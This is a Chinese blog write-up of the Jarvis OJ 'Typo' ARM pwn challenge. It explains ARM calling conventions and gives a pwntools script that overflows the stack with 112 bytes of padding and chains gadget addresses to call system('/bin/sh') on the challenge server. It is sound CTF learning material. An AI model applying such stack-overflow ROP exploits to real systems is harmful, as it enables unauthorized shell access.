[Jarvis OJ - PWN]——Typo(内涵peak小知识)

最新推荐文章于 2023-03-07 11:05:30 发布
最新推荐文章于 2023-03-07 11:05:30 发布
阅读量304 收藏
点赞数 1
分类专栏: # Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113838019
版权

[Jarvis OJ - PWN]——Typo

还是先check一下, 是arm架构。还是第一次遇到。
在这里插入图片描述

peak小知识

和x86架构不同, arm架构arm 下的函数调用规定, 函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 eip,保存下一条指令的地址

在IDA中, 可能没办法F5, 自己调试一下就好。
在这里插入图片描述
在这里插入图片描述

exploit

from pwn import *
binsh_addr = 0x0006C384
p = remote("pwn2.jarvisoj.com", 9888, timeout = 2)
p.sendafter("quit\n", "\n")
p.recvline()

payload = 'a' * 112 + p32(0x20904) + p32(binsh_addr) * 2 + p32(0x110B4)
p.sendlineafter("\n", payload)
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
通过一道ARM PWN题引发的思考:jarvisOJ_typo
hollk’s blog
06-28 1314
最近做了一道ARM架构的PWN题,给我带来很多的思考。为什么要做ARM的呢?因为在很久之前就提及过想要向IoT漏洞挖掘方面进行延展,并且有过一段时间去复现一些路由器的漏洞,但是感觉基础并不是很扎实。所以这段时间潜心学习ARM寄存器及指令集,并且通过接下来的这道ARM PWN题进行实践与摸索,文章的末尾也会列出通过这道题带来的一些感悟 希望我们都能找到自己的方向,按照计划不断前行。编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
jarvisoj_typo
z1r0的博客
03-17 415
jarvisoj_typo 查看保护 arm程序,这一类的环境的话可以去网上找找怎么安装,qemu,gdb-multiarch,等 等 32位,静态链接,去了符号表信息攻击思路:因为去了符号表信息,进了ida之后基本看不出程序功能 这里笔者直接手动fuzz了一下发现有栈溢出漏洞 保护没有开canary和pie,所以考虑rop了。 劫持程序控制流执行system("/bin/sh");找一下/bin/sh 看了一下引用,跟进10bab 这个函数和do_system()很相似,暂且先认为它是syste
jarvis oj typo
发蝴蝶和大脑斧的博客
06-04 705
m4x的–如何pwn掉一个arm binary arm 的参数 1 ~ 4 分别保存到 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡, 返回值存放在 r0中 by the way, arm 的 pc 指针相当于 eip/rip, b/bl 等指令实现了跳转 ...
[Jarvis OJ] -Basic
weixin_33805743的博客
12-09 520
https://www.jarvisoj.com/challenges Basic -.-字符串 请选手观察以下密文并转换成flag形式 ..-. .-.. .- --. ..... ..--- ..--- ----- .---- ---.. -.. -.... -.... ..... ...-- ---.. --... -.. .---- -.. .- ----. ...-- .---- ---...
PWN-ARM-jarvisOJ_typo学习
重启专家的博客
12-07 321
PWN-ARM-jarvisOJ_typo学习
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
jarvis一个非常智能基于Webpack仪表板的浏览器
08-10
jarvis 一个非常智能基于Webpack仪表板的浏览器
jarvis 半色调 matlab
04-13
可应用于数字图像处理,将灰度图像或者彩色图像R,G,B某个通道的图像转换为二值图像,也称半色调处理
Jarvis OJ level1题解
educat0r的博客
02-19 553
题目网址https://www.jarvisoj.com/challenges Pwn区level1题 首先把文件放入gdb中用checksec分析 分析发现,没有开启NX保护,说明文件内没有包含system(‘/bin/sh’),说明本题需要自己去构造shellcode。NX保护未开启表示着你输入的东西可执行,所以你需要构造shellcode填充数据,然后利用返回地址再次返回这个变量,就可以执...
准备搞一下CTF,有没有练习CTF的地方?
最新发布
瓦罗兰特顶级C位的博客
03-07 311
CTF对新手,尤其是学生一族学习网络安全有非常大的帮助,今天就给大家推荐一些CTF练手的网站,都是不用花钱免费使用哦!
Jarvisoj 逆向总结
Assassin
10-13 3825
因为本人是菜鸟,所以由简单但难的做了 [61dctf]androideasy 没什么可说的,直接反汇编打求一下密码 #_*_coding:utf-8_*_ a=[113, 123, 118, 112, 108, 94, 99, 72, 38, 68, 72, 87, 89, 72, 36, 118, 100, 78, 72, 87, 121, 83, 101, 39, 62, 94,...
PWN题搭建
weixin_30855761的博客
06-07 553
0x00.准备题目 例如:level.c #include <stdio.h> #include <unistd.h> int main(){ char buffer[0x10] = {0}; setvbuf(stdout, NULL, _IOLBF, 0); printf("Do your kown what is it : ...
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 2825
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2394
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值